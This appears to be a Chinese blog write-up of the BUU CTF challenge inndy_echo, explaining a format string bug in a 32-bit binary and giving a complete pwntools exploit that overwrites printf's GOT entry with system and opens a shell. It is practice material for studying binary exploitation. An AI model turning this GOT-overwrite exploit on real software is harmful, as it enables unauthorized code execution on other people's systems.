BUU-inndy_echo-WP

2020 年 11 月 24 日

773 次浏览

2241字数

一道简单的hijack got，我做了一下午，原因是"%7$hn"写成了"$7hn"，说到底来还是不熟练。

<div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201124184253.png" alt="" class="wp-image-607"style=""></figure></div>

存在明显的格式化字符串漏洞。我们考虑劫持printf的got表值为system的plt地址。

<code>payload = p32(printfgot + 2) + p32(printfgot) + "%2044c"&nbsp;+ '%7$hn'&nbsp;+ "%31740c"&nbsp;+ '%8$hn'</code>就有了这样的payload。

由于我在愚蠢的错误上卡住了，所以看了一些wp，发现pwntools集成了一个很强的工具，像这道题目我们可以通过<code>fmtstr_payload(argue_place, {printf_got_addr: system_plt_addr})</code>,其中argue_place代表payload中前四个字符所在的参数位置（就是说<code>%p$n</code>中p的值）。这样就非常的方便。

然后我为了看我到底有没有修改got的值，我还看了一下如何借用gdb来动态调试，由于我使用的是wsl2，没有图形化界面，需要特殊处理

再exp中先指定terminal，添加一句

<pre class="wp-block-code"><code>context.terminal = &#91;'tmux','splitw','-h']</code></pre>

然后在创建进程变量后，添加

<pre class="wp-block-code"><code>gdb.attach(proc.pidof(sh)&#91;0],gdbscript="b main")#这里的sh是进程变量</code></pre>

这样调试时先打开tmux，然后就可以动态调试了

<figure class="wp-block-image size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/屏幕截图-2020-11-24-185410.png" alt="" class="wp-image-608"style=""></figure>

最后的exp

<pre class="wp-block-code"><code>from pwn import * 
 
context(log_level = 'debug',arch = 'i386',os = 'linux') 
#context.terminal = &#91;'tmux','splitw','-h'] 
 
elf = ELF("./echo") 
printfgot = elf.got&#91;"printf"] 
 
sh =process("./echo") 
#sh = remote("node3.buuoj.cn","25950") 
#gdb.attach(proc.pidof(sh)&#91;0],gdbscript="b main") 
 
payload = p32(printfgot + 2) + p32(printfgot) + "%2044c" + '%7$hn' + "%31740c" + '%8$hn' 
sh.sendline(payload) 
sh.recvuntil("\n") 
sh.sendline("/bin/sh\x00") 
 
sh.interactive() </code></pre>

最后修改：2020 年 12 月 30 日